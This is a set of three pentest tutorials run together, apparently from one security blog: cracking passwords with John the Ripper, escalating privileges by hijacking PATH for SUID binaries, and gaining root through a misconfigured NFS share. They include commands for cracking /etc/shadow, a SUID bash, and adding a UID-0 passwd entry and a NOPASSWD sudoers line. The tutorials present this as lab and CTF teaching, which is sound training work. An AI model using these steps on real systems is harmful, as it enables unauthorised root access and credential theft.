Beginner Guide John the Ripper (Part 1)

We know the importance of John the ripper in penetration testing, as it is quite popular among password cracking tool. In this article, we are introducing the John the ripper and its various usage for beginners.

What is John the Ripper?

John the Ripper is a free password cracking software tool developed by Openwall. Originally developed for Unix Operating Systems but later on developed for other platforms as well. It is one of the most popular password testings and breaking programs as it combines a number of password crackers into one package, autodetects password hash types, and includes a customizable cracker. It can be run against various encrypted password formats including several crypt password hash types commonly found in Linux, Windows. It can also be to crack passwords of Compressed files like ZIP and also Documents files like PDF.

Where to get John the Ripper?

John the Ripper can be downloaded from Openwall’s Website here.

Or from the Official John the Ripper Repo here

John the Ripper comes Preinstalled in Linux Kali and can be run from the terminal as shown below:

John the Ripper works in 3 distinct modes to crack the passwords:

1.       Single Crack Mode

2.       Wordlist Crack Mode

3.       Incremental Mode 

John the Ripper Single Crack Mode

In this mode John the ripper makes use of the information available to it in the form of a username and other information. This can be used to crack the password files with the format of

Username: Password

For Example: If the username is “Hacker” it would try following passwords:

hacker

HACKER

hacker1

h-acker

hacker=

We can use john the ripper in Single Crack Mode as follows:

Here we have a text file named crack.txt containing the username and password, where the password is encrypted in sha1 encryption so to crack this password we will use:

Syntax: john [mode/option] [password file]

john --single --format=raw-sha1 crack.txt

As you can see in the screenshot that we have successfully cracked the password.

Username: ignite Password: IgNiTe

John the Ripper Wordlist Crack Mode

In this mode John the ripper uses a wordlist that can also be called a Dictionary and it compares the hashes of the words present in the Dictionary with the password hash. We can use any wordlist of our choice. John also comes in build with a password.lst which contains most of the common passwords.

Let’s see how John the Ripper cracks passwords in Wordlist Crack Mode:

Here we have a text file named crack.txt containing the username and password, where the password is encrypted in sha1 encryption so to crack this password we will use:

Syntax: john [wordlist] [options] [password file]

john --wordlist=/usr/share/john/password.lst --format=raw-sha1 crack.txt

As you can see in the screenshot, john the Ripper have cracked our password to be asdfasdf

Cracking the User Credentials

We are going to demonstrate two ways in which we will crack the user credentials of a Linux user.

Before that we will have to understand, what is a shadow file?

In Linux operating system, a shadow password file is a system file in which encrypted user password is stored so that they are not available to the people who try to break into the system. It is located at /etc/shadow.

First Method

Now, for the first method, we will crack the credentials of a particular user “pavan”.

Now to do this First we will open the shadow file as shown in the screenshot.

And we will find the credentials of the user pavan and copy it from here and paste it into a text file. Here we have the file named crack.txt.

Now we will use john the ripper to crack it.

john crack.txt

As you can see in the screenshot that john the ripper has successfully cracked the password for the user pavan.

Second Method

Now, for the second method, we will collectively crack the credentials for all the users.

To do this we will have to use a john the ripper utility called “unshadow”.

unshadow /etc/passwd /etc/shadow > crack.txt

Here the unshadow command is combining the /etc/passwd and /etc/shadow files so that John can use them to crack them. We are using both files so that John can use the information provided to efficiently crack the credentials of all users.

Here is how the crack file looks after unshadow command.

Now we will use john to crack the user credentials of all the users collectively.

john –wordlist=/usr/share/john/password.lst crack.txt

As you can see from the provided screenshot that we have discovered the following credentials:

User	Password
Raj	123
Pavan	Asdfasdf
Ignite	Yellow

Stopping and Restoring Cracking

While John the ripper is working on cracking some passwords we can interrupt or pause the cracking and Restore or Resume the Cracking again at our convenience.

So while John the Ripper is running you can interrupt the cracking by Pressing “q” or Crtl+C as shown in the given screenshot

Now to resume or restore the cracking process we will use the --restore option of John the ripper as shown in the screenshot

Now we will decrypt various hashes using John the Ripper

SHA1

To decrypt SHA1 encryption we will use RockYou as wordlist and crack the password as shown below:

john –wordlist=/usr/share/wordlists/rockyou.txt –format=raw-sha1 crack.txt

As you can see in the given screenshot that we have the username pavan and password as Hacker

MD5

To decrypt MD5 encryption we will use RockYou as wordlist and crack the password as shown below:

john –wordlist=/usr/share/wordlists/rockyou.txt –format=raw-md5 crack.txt

As you can see in the given screenshot that we have the username pavan and password as P@ssword.

MD4

To decrypt MD4 encryption we will use RockYou as wordlist and crack the password as shown below:

john –wordlist=/usr/share/wordlists/rockyou.txt –format=raw-md4 crack.txt

As you can see in the given screenshot that we have the username pavan and password as Rockyou

SHA256

To decrypt SHA256 encryption we will use RockYou as wordlist and crack the password as shown below:

john –wordlist=/usr/share/wordlists/rockyou.txt –format=raw-sha256 crack.txt

As you can see in the given screenshot that we have the username pavan and password as pAsSwOrD

RIPEMD128

To decrypt RIPEMD128 encryption we will use RockYou as wordlist and crack the password as shown below:

john –wordlist=/usr/share/wordlists/rockyou.txt –format=ripemd-128 crack.txt

As you can see in the given screenshot that we have the username pavan and password as password123

Whirlpool

To decrypt whirlpool encryption we will use RockYou as wordlist and crack the password as shown below:

john –wordlist=/usr/share/wordlists/rockyou.txt –format=whirlpool crack.txt

As you can see in the given screenshot that we have the username pavan and password as password666

View All Formats

John the Ripper support many encryptions some of which we showed above. To view all the formats it supports:

john –list=formats

Hope,  you can take reference of this article while using John the ripper, More on John the Ripper will be in the Next Part.

Abbreviating the options

We don’t have to type complete option every time we use john the ripper, Developers have give users the option to abbreviate the options like

--single can be written as -si

--format can be written as -form

Shown below is an example how to use these abbreviations.

john -si crack.txt -form=raw-md5

Another abbreviation we can use is:

--wordlist can be written as -w

john -w=/usr/share/wordlists/rockyou.txt crack.txt -form=raw-md5

Cracking Multiple Files

We can also crack multiple hash files, if they have the same encryption. Let’s take an example, we have two files.

1.       Crack.txt

2.       Md5.txt

Both contain md5 hashes, so to crack both files in one session, we will run john as follow:

Syntax: john [file 1][file 2]

john -form=raw-md5 crack.txt md5.txt

Linux Privilege Escalation Using PATH Variable

After solving several OSCP Challenges we decided to write the article on the various method used for Linux privilege escalation, that could be helpful for our readers in their penetration testing project. In this article, we will learn “various method to manipulate $PATH variable” to gain root access of a remote host machine and the techniques used by CTF challenges to generate $PATH vulnerability that lead to Privilege escalation. If you have solved CTF challenges for Post exploit then by reading this article you will realize the several loopholes that lead to privileges escalation.

Table of contents

Introduction

·         What is PATH

·         How to view PATH of remote machine

Operating Nullbyte CTF

·         Ubuntu victim lab set-up

·         Penetrating victim’s VM Machine

·         Exploiting $PATH via:

·         Echo command

·         cp command

·         symlinking

Operating Skuzzy CTF

·         Ubuntu victim lab set-up

·         Penetrating victim’s VM Machine

·         Exploiting $PATH via:

·         Echo command

Operating Lazy HTB

·         Ubuntu victim lab set-up

·         Penetrating victim’s VM Machine

·         Exploiting $PATH via:

·         Nano Editor

Operating PwnLab CTF

·         Ubuntu victim lab set-up

·         Penetrating victim’s VM Machine

·         Exploiting $PATH via:

·         Vi editor

Lets Start!!

Introduction

PATH is an environmental variable in Linux and Unix-like operating systems which specifies all bin and sbin directories where executable programs are stored. When the user run any command on the terminal, its request to the shell to search for executable files with help of PATH Variable in response to commands executed by a user. The superuser also usually has /sbin and /usr/sbin entries for easily executing system administration commands. 

It is very simple to view Path of revelent of revelent user with help of echo command

echo $PATH

/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

If you notice ‘.’ in your PATH it means that the logged user can execute binaries/scripts from the current directory and it can be an excellent technique for an attacker to escalate root privilege. This is due to lack of attention while writing program thus admin do not specify the full path to the program.

Operating Nullbyte CTF

Nullbyte is a CTF challenge hosted by vulnhub to sharpen your penetration skillset. When you will solve this challenge you will realize that for the privilege escalation you have manipulated environment PATH for ps command which is a system binary.  

But here we are trying to enumerate the loophole that leads to privileges escalation and for that, we will set up our own local machine (Ubuntu) and try to configure approx. same vulnerability, therefore we request you go with the walkthrough of each lab mention in this article.

Ubuntu LAB SET_UP

Currently, we are in /home/raj directory where we will create a new directory with the name as /script. Now inside script directory, we will write a small c program to call a function of system binaries.

pwd

mkdir script

cd /script

nano demo.c

As you can observe in our demo.c file we are calling ps command which is system binaries.

After then compile the demo.c file using gcc and promote SUID permission to the compiled file.

ls

gcc demo.c -o shell

chmod u+s shell

ls -la shell

Penetrating victim’s VM Machine

First, you need to compromise the target system and then move to privilege escalation phase. Suppose you successfully login into victim’s machine through ssh. Then without wasting your time search for the file having SUID or 4000 permission with help of Find command.

find / -perm -u=s -type f 2>/dev/null

Hence with help of above command, an attacker can enumerate any executable file, here we can also observe /home/raj/script/shell having suid permissions.

Then we move into /home/raj/script and saw an executable file “shell”. So we run this file, and here it looks like the file shell is trying to run ps and this is a genuine file inside /bin for Process status.

ls

./shell

Echo command

cd /tmp

echo “/bin/sh” > ps

chmod 777 ps

echo $PATH

export PATH=/tmp:$PATH

cd /home/raj/script

./shell

whoami

Copy command

cd /home/raj/script/

cp /bin/sh /tmp/ps

echo $PATH

export PATH=/tmp:$PATH

./shell

whoami

Symlink command

ln -s /bin/sh ps

export PATH=.:$PATH

./shell

id

whoami

NOTE: symlink is also known as symbolic links that will work successfully if the directory has full permission. In Ubuntu, we had given permission 777 to /script directory in the case of a symlink.

Thus we saw to an attacker can manipulate environment variable PATH for privileges escalation and gain root access.

Operating Skuzzy CTF

Skuzzy is also a CTF challenge hosted by vulnhub and when you will solve this challenge you will notice that for the privilege escalation we have manipulated environment PATH for id which is a system binary. It is also as similar to above Lab set-up with little bit modification.

LAB SET_UP

Currently, we are in /home/raj directory where we will create a new directory with the name as /script. Now inside script directory, we will write a small c program to call a function of system binaries.

pwd

mkdir script

cd /script

nano demo.c

As you can observe in our demo.c file we are calling id command which is system binaries.

After then compile the demo.c file using gcc and promote SUID permission to the compiled file.

ls

gcc demo.c -o shell2

chmod u+s shell2

ls -la shell2

Penetrating victim’s VM Machine

First, you need to compromise the target system and then move to privilege escalation phase. Suppose you successfully login into victim’s machine through ssh. Then without wasting your time search for the file having SUID or 4000 permission with help of Find command. Here we can also observe /home/raj/script/shell2 having suid permissions.

find / -perm -u=s -type f 2>/dev/null

Then we move into /home/raj/script and saw an executable file “shell2”. So we run this file, it looks like the file shell2 is trying to run id and this is a genuine file inside /bins.

cd /home/raj/script

ls

./shell2

Echo command

cd /tmp

echo “/bin/sh” > id

chmod 777 id

echo $PATH

export PATH=/tmp:$PATH

cd /home/raj/script

./shell2

whoami

Operating Lazy HTB

Lazy is another CTF challenge hosted by Host The Box and when you will solve this challenge you will realize that for the privilege escalation you have manipulated environment PATH for cat command which is a system binary. It is also as similar to above Lab set-up with little bit modification.

LAB SET_UP

Repeat above step for setting your own lab and as you can observe in our demo.c file we are calling cat command to read the content from inside etc/passwd file.

After then compile the demo.c file using gcc and promote SUID permission to the compiled file.

ls

gcc demo.c -o raj

chmod u+s raj

ls -la raj

Penetrating victim’s VM Machine

Again compromised the Victim’s system and then move for privilege escalation phase and execute below command to view sudo user list.

find / -perm -u=s -type f 2>/dev/null

Here we can also observe /home/raj/script/raj having suid permissions, then we move into /home/raj/script and saw an executable file “raj”. So when we run this file it put-up etc/passwd file as result.

cd /home/raj/script/

ls

./raj

Nano Editor

cd /tmp

nano cat

Now type /bin/bash when terminal get open and save it.

chmod 777 cat

ls -al cat

echo $PATH

export PATH=/tmp:$PATH

cd /home/raj/script

./raj

whoami

Operating PwnLab CTF

PawLab is another CTF challenge hosted by vulnhub and when you will solve this challenge you will realize that for the privilege escalation you have manipulated environment PATH for cat command which is a system binary. It is also as similar to above Lab set-up with little bit modification. This set-up is not exactly as PwnLab setup but like an overview.

LAB SET_UP

Repeat above step for setting your own lab and as you can observe in our demo.c file we are calling cat command to read msg.txt which is inside /home/raj but there is no such file inside /home/raj.

After then compile the demo.c file using gcc and promote SUID permission to the compiled file.

ls

gcc demo.c -o ignite

chmod u+s ignite

ls -la ignite

Penetrating victim’s VM Machine

Once again compromised the Victim’s system and then move for privilege escalation phase and execute below command to view sudo user list.

find / -perm -u=s -type f 2>/dev/null

Here we can also observe /home/raj/script/ignite having suid permissions, then we move into /home/raj/script and saw an executable file “ignite”. So when we run this file it put-up an error “cat: /home/raj/msg.txt” as result.

cd /home/raj/script

ls

./ignite

Vi Editor

cd /tmp

vi cat

Now type /bin/bash when terminal gets open and save it.

chmod 777 cat

ls -al cat

echo $PATH

export PATH=/tmp:$PATH

cd /home/raj/script

./ignite

whoami

Linux Privilege Escalation using Misconfigured NSF

After solving several OSCP Challenges we decided to write the article on the various method used for Linux privilege escalation, that could be helpful for our readers in their penetration testing project. In this article, we will learn how to exploit a misconfigured NFS share to gain root access to a remote host machine.

Table of contents

Introduction of NFS

Misconfigured NFS Lab setup

Scanning NFS shares

·         Nmap script

·         showmount

Exploiting NFS server for Privilege Escalation via:

Bash file

C program file

Nano/vi

·         Obtain shadow file

·         Obtain passwd file

·         Obtain sudoers file

Let’s Start!!

Network File System (NFS): Network File System permits a user on a client machine to mount the shared files or directories over a network. NFS uses Remote Procedure Calls (RPC) to route requests between clients and servers. Although NFS uses TCP/UDP port 2049 for sharing any files/directories over a network.

Misconfigured NFS Lab setup

Basically, there are three core configuration files (/etc/exports, /etc/hosts.allow, and /etc/hosts.deny) you will need to configure to set up an NFS server. BUT to configure weak NFS server we will look only /etc/export file.

To install NFS service execute below command in your terminal and open /etc/export file for configuration.

sudo apt-get update

sudo apt install nfs-kernel-server

nano /etc/exports

The /etc/exports file holds a record for each directory that you expect to share within a network machine. Each record describes how one directory or file is shared. 

Apply basic syntax for configuration:

Directory         Host-IP(Option-list)

There are various options will define which type of Privilege that machine will have over shared directory.

·         rw : Permit clients to read as well as write access to shared directory.

·         ro : Permit clients to Read-only access to shared directory..

·         root_squash: This option Prevents file request made by user root on the client machine because NFS shares change the root user to the nfsnobody user, which is an unprivileged user account.

·         no_root_squash: This option basically gives authority to the root user on the client to access files on the NFS server as root. And this can lead to serious security implication.

·         async: It will speed up transfers but can cause data corruption as NFS server doesn’t wait for the complete write operation to be finished on the stable storage, before replying to the client.

·         sync:   The sync option does the inverse of async option where the NFS server will reply to the client only after the data is finally written to the stable storage.

Hopefully, it might be clear to you, how to configure the /etc/export file by using a particular option. An NFS system is considered weak or Misconfigured when following entry/record is edit into it for sharing any directory.

/home       *(rw,no_root_squash)

Above entry shows that we have shared /home directory and allowed the root user on the client to access files to read/ write operation and * sign denotes connection from any Host machine. After then restart the service with help of the following command.

sudo /etc/init.d/nfs-kernel-server restart

Scanning NFS shares

Nmap

You can take help of Nmap script to scan NFS service in target network because it reveals the name of share directory of target’s system if port 2049 is opened.

nmap -sV --script=nfs-showmount 192.168.1.102

Basically nmap exports showmount -e command to identify the shared directory and here we can clearly observe /home * is shared directory for everyone in the network.

Showmount

The same thing can be done manually by using showmount command but for that install nfs-common package on your local machine with help of the following command.

apt-get install nfs-common

showmount -e 192.168.1.102

Exploiting NFS server for Privilege Escalation

Bash file

Now execute below command on your local machine to exploit NFS server for root privilege.

mkdir /tmp/raj

mount -t nfs 192.168.1.102:/home /tmp/raj

cp /bin/bash .

chmod +s bash

ls -la bash

Above command will create a new folder raj inside /tmp and mount shared directory /home inside /tmp/raj. Then upload a local exploit to gain root by copying bin/bash and set suid permission.

Use df -h command to get summary of the amount of free disk space on each mounted disk.

First, you need to compromise the target system and then move to privilege escalation phase. Suppose you successfully login into victim’s machine through ssh. Now we knew that /home is shared directory, therefore, move inside it and follow below steps to get root access of victim's machine.

cd /home

ls

./bash -p

id

whoami

So, it was the first method to pwn the root access with help of bin/bash if NFS system is configured weak. 

C Program

Similarly, we can use C language program file for root privilege escalation. We have generated a C-Program file and copied it into /tmp/raj folder. Since it is c program file therefore first we need to compile it and then set suid permission as done above.

cp asroot.c /tmp/root

cd /tmp/raj

gcc asroot.c -o shell

chmod +s shell

Now repeat the above process and run shell file to obtained root access.

cd /home

ls

./shell

id

whoami

So, it was the second method to pwn the root access with help of bin/bash via c-program if NFS system is misconfigured. 

Nano/Vi

Nano and vi editor both are most dangerous applications that can lead to privilege escalation if share directly or indirectly. In our case, it not shared directly but still, we can use any application for exploiting root access.

Follow below steps:

cp /bin/nano

chmod 4777 nano

ls -la nano

Since we have set suid permission to nano therefore after compromising target's machine at least once we can escalate root privilege through various techniques.

Shadow File

cd /home

ls

./nano -p etc/shadow

When you will execute above command it will open shadow file, from where you can copy the hash password of any user.

Here I have copied hash password of the user: raj in a text file and saved as shadow then use john the ripper to crack that hash password.

Awesome!!! It tells raj having password 123. Now either you can login as raj and verify its privilege or follow next step.

Passwd file

Now we know the password of raj user but we are not sure that raj has root privilege or not, therefore, we can add raj into the root group by editing etc/passwd file.

Open the passwd file with help of nano and make following changes

./nano -p etc/passwd

raj:x:0:0:,,,:/home/raj:/bin/bash

Now use su command to switch user and enter the password found for raj.

su raj

id

whoami

Great!!! This was another way to get root access to target's machine.

Sudoers file

We can also escalate root privilege by editing sudoers file where we can assign ALL privilege to our non-root user (ignite).

Open the sudoers file with help of nano and make following changes

./nano -p etc/sudoers

ignite ALL=(ALL:ALL) NOPASSWD: ALL

Now use sudo bash command to access root terminal and get root privilege

sudo bash

id

whoami

Conclusion: Thus we saw the various approach to escalated root privilege if port 2049 is open for NFS services and server is weak configured. For your practice, you can play with ORCUS which is a vulnerable lab of vulnhub and read the article from here.